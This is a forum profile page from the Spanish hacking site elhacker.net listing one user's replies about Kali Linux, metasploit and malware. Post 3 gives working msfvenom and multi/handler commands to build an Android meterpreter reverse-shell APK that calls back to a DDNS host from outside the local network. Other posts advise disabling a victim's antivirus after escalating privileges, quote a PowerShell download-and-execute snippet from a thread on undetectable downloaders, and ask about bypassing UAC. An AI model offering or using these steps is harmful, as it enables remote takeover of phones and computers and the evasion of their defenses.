elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


  Mostrar Mensajes
Páginas: [1] 2
1  Seguridad Informática / Hacking / Re: ipconfig o ifconfig en: 16 Febrero 2017, 16:07 pm
¡Lo que te está pasando es que estas haciendo pruebas en dos redes diferentes!  en la configuración de virtualbox de tu máquina Kali Linux ve a la opción de red y cambia el campo que dice conectado a: por adaptador puente y en el segundo campo selecciona la tarjeta de red en la que estas conectado ya sea por WIFI o por Ethernet y con este ya debería de arrojarte tu máquina virtual una dirección 192.168.x.x.
2  Seguridad Informática / Hacking / Re: Duda: Empezar en el mundo del Hacker en: 31 Enero 2017, 16:42 pm
Me agrada que siga habiendo personas nuevas en este foro, me pongo a su disposición para ayudarlos en su larga trayectoria del aprendizaje, pueden mandarme un mensaje privado para ayudarlos.


¡Saludos!!
3  Seguridad Informática / Hacking / Re: metasploit-msfvenom fuera de red (no-ip2) en: 31 Enero 2017, 16:36 pm
Primero que nada creo que es necesario saber si esta funcionando correctamente tu NO-IP, puedes habilitar en Kali linux el servicio de apache y abrir el puerto 80 en tu router y ver si accedes con el dominio a NO-IP, si puedes acceder sin ningun problema puedes intentar configurar tu metasploit de la siguiente manera

msfvenom -p android/meterpreter/reverse_tcp lhost=nombre.ddns.net lport=4455 > /root/Escritorio/malware.apk

service postgresql start
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.20   -------------- Aqui pon la ip local de tu kali
set lport 4455
exploit


para ello deberas tener en tu router abierto el puerto 4455 apuntando a tu direccion local, en este caso la máquina en donde tienes configurado el NO-IP.

comenta si te funciono!!
4  Seguridad Informática / Hacking / Re: Pagina con nuevas vulnerabilidades? en: 23 Diciembre 2016, 17:30 pm
http://unaaldia.hispasec.com/
5  Seguridad Informática / Hacking / Re: backdoor con meterpreter en: 29 Noviembre 2016, 17:30 pm
Primero escala privilegios e intenta detener o desinstalar el antivirus, algunos de ellos no permiten
que su servicio se detenga.
6  Seguridad Informática / Hacking / Re: primera sesion de meterpreter win xp en: 29 Noviembre 2016, 17:07 pm
Esta usando maquinas virtuales, en este caso las emula con Virtualbox.

Y con referente a las direcciones IP, para poder obtener comunicación entre la máquina
Kali Linux y la de Win XP necesitas estar dentro de una red. Las direcciones ip te las asigna
tu modem o router automáticamente.
7  Seguridad Informática / Análisis y Diseño de Malware / Re: Creando un downloader indecetable que ocupa 2 kbytes en: 15 Abril 2016, 00:11 am
tengo una duda!!

Realice una prueba con el codigo

c=$env:userprofile+'\tmp.exe';
(New-Object System.Net.WebClient).Downloadfile('https://live.sysinternals.com/procexp.exe',$c);
Start-Process $c

tengo una duda a que te refieres con tmp.exe seria de gran ayuda que me sacaras de esa duda.

8  Seguridad Informática / Bugs y Exploits / Elevasion de privilegios SYSTEM en: 19 Enero 2016, 00:23 am
Que tal!!
me gustaria alguna orientación acerca de como poder saltar la UAC de windows.

Consigo una sesion meterpreter pero a la hora de ejecutar los comandos getprivs y getsystem y sale el siguiente error:

priv_elevate_getsystem: Operation failed: The environmet is incorrect. The followinf was attempted:
Named Pipe Impersonation (In Memory/Admin)
Named Pipe Impersonation (Dropper/Admin)
Token Duplication (In Memory/Admin)

alguna sugerencia se las agradeceria mucho.

Gracias.
9  Seguridad Informática / Bugs y Exploits / Re: Problema con Metasploit y msfvenom en: 19 Octubre 2015, 19:21 pm
Se especifico como lo haces para poder ver en que estas mal?
10  Seguridad Informática / Hacking / Re: ayuda con pc hackeado en: 8 Octubre 2015, 18:21 pm
Es necesario tener el disco duro aun que uses un Live CD, lo mas problabe es que tengas un virus
alojado en el BIOS, asi que aun que se formatee el equipo el virus persiste, este tipo de virus no son
muy comunes y deberas ser una persona con un muy buen trabajo para que alguien quiera ver lo que haces y en lo que trabajas...
Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines